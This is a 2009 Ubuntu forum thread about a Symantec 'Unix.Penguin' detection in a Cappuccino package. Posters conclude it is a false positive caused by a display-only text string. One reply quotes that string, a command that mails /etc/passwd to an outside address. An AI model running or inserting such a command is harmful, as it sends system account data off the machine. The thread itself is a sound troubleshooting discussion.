Results 1 to 5 of 5

Thread: Virus UNIX.Penguin Detected in Repository

  1. March 25th, 2009 #1
    tlutz
    tlutz is offline First Cup of Ubuntu
    Join Date
    Oct 2007
    Beans
    6

    Exclamation Virus UNIX.Penguin Detected in Repository

    I recently used apt-mirror to grab the repositories for Dapper (6.06 LTS) and for Intrepid (8.04 LTS). I ran a virus scan on the entire 80 gigs of stuff and Symantic found a security risk known as "Unix.Penguin" inside the Cappuccino package (version 0.5.something). Supposedly this security risk is a shell script that attempts to e-mail password databases etc. Can someone confirm that this threat exists or provide a reasonable explanation as to why this was detected as a threat?

    Thank you,
    Tom
    Advanced reply Adv Reply  
  2. March 26th, 2009 #2
    mikewhatever
    mikewhatever is offline Ubuntu addict and loving it
    Join Date
    Aug 2006
    Beans
    13,354
    Distro
    Ubuntu Mate 20.04 Focal Fossa

    Re: Virus UNIX.Penguin Detected in Repository

    Could be a false positive for example. Try a couple of online scanners on that package to confirm.
    As an after thought, I wonder what virus scanner did you use, and are there any with data bases for Linux.
    Advanced reply Adv Reply  
  3. March 26th, 2009 #3
    aos101's Avatar
    aos101
    aos101 is offline Just Give Me the Beans!
    Join Date
    Aug 2006
    Location
    Kent, UK
    Beans
    57
    Distro
    Ubuntu 10.04 Lucid Lynx

    Re: Virus UNIX.Penguin Detected in Repository

    Quote Originally Posted by tlutz View Post
    Can someone confirm that this threat exists or provide a reasonable explanation as to why this was detected as a threat?

    Thank you,
    Tom
    I think as said above it is a false positive. Line 25 of compileline.grm in the source package for the program contains this command which is probably what causes Symantec to complain:
    Code:
    cat /etc/passwd | mail president@whitehouse.gov
    But I don't think it executes that code at all. The compileline.grm file contains lots of possible commands and parts of commands that are then put together to come up with random commands, which the program then displays on the screen to make it look like you are doing work (as you can see in the attached screenshot).

    I assume Symantec just searches files for commands similar to the one above, and just assumes it's a virus regardless of context (it doesn't understand that the command is just a text string that doesn't get executed).
    Attached Images Attached Images
    Advanced reply Adv Reply  
  4. March 26th, 2009 #4
    tlutz
    tlutz is offline First Cup of Ubuntu
    Join Date
    Oct 2007
    Beans
    6

    Smile Re: Virus UNIX.Penguin Detected in Repository

    Thanks for the prompt responses. Symantec did detect the 'risk' in the 'compileline.grm' file, so I think you are right about line 25.

    Cheers,
    Tom
    Advanced reply Adv Reply  
  5. March 26th, 2009 #5
    koenn
    koenn is offline Ubuntu addict and loving it
    Join Date
    Nov 2006
    Location
    Belgium
    Beans
    3,025
    Distro
    Ubuntu 10.04 Lucid Lynx

    Re: Virus UNIX.Penguin Detected in Repository

    Quote Originally Posted by aos101 View Post
    I assume Symantec just searches files for commands similar to the one above, .
    Your assumption is correct. Symantec defines Unix.Penguin as "a shell script that mails out the passwd file". A text file probably qualifies as shell script, so it fits their definition.

    Their recommended cure is "delete the shell script"

    http://www.symantec.com/security_res...041803-0917-99
    Advanced reply Adv Reply  
« Previous Thread | Next Thread »

Tags for this Thread

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  

Ubuntu Forums Code of Conduct